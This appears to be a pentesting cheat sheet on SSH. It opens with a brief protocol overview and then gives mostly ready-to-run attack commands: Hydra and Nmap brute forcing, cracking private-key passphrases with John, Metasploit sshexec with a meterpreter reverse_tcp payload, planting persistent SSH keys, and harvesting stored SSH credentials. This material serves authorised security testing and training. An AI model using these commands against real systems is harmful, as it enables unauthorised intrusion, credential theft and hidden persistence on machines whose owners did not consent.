SSH

The SSH Protocol

SSH (Secure Shell) was developed as a secure alternative to earlier network protocols like FTP, Telnet, and RSH, which facilitated data exchange between machines but lacked security features such as authentication, data integrity, and confidentiality.

Key RFCs Defining SSH:

  • RFC 4250 & RFC 4251 — Define the protocol's architecture and terminology.

  • RFC 4252 — SSH-USERAUTH for client authentication; key-based authentication is recommended.

  • RFC 4253 — SSH-TRANS for server authentication and secure communication channel establishment (ensuring data integrity and confidentiality).

  • RFC 4254 — SSH-CONNECT, which specifies command handling and data multiplexing.

The default SSH port is 22, but the listening port (and other server settings) can be changed in sshd_config.

cd /etc/ssh
nano sshd_config

Use Cases

  • SSH should be used instead of Telnet, RSH, and RLOGIN for remote administration.

  • SCP or SFTP should be used instead of RCP and FTP for file transfers.

  • SSH is also used for port forwarding.

Pentesting SSH

Password Cracking with Hydra

hydra -L users.txt -P pass.txt <IP> ssh -s <PORT>

Passphrase Cracking with John

ssh2john id_rsa > sshhash
john --wordlist=/usr/share/wordlists/rockyou.txt sshhash

Authentication with Metasploit

Password-based Authentication

use exploit/multi/ssh/sshexec
set rhosts <IP>
set payload linux/x86/meterpreter/reverse_tcp
set username <USERNAME>
set password <PASSWORD>
show targets
set target <n>
exploit

Key-based Authentication

use auxiliary/scanner/ssh/ssh_login_pubkey
set rhosts <IP>
set key_path id_rsa
set username <USERNAME>
set key_pass <PASSWORD>
exploit
sessions
sessions -u <n>

Persistence

After establishing a meterpreter session, you can set up persistence. The key pair the module creates is stored under /root/.msf4/loot.

sessions
use post/linux/manage/sshkey_persistence
set session <n>
exploit

cd /root/.msf4/loot
mv <Created Key> key
chmod 600 key
ssh -i key <USER>@<IP>

Gathering Information

use post/multi/gather/ssh_creds
set session <n>
exploit

Nmap Scripts

Basic SSH brute force

nmap --script ssh-brute -p <SSH PORT> <IP>

SSH brute force with custom username and password lists

nmap --script ssh-brute --script-args userdb=usernames.txt,passdb=passwords.txt -p <SSH PORT> <IP>

Identify SSH authentication methods

nmap --script ssh-auth-methods --script-args="ssh.user=pentest" -p <SSH PORT> <IP>
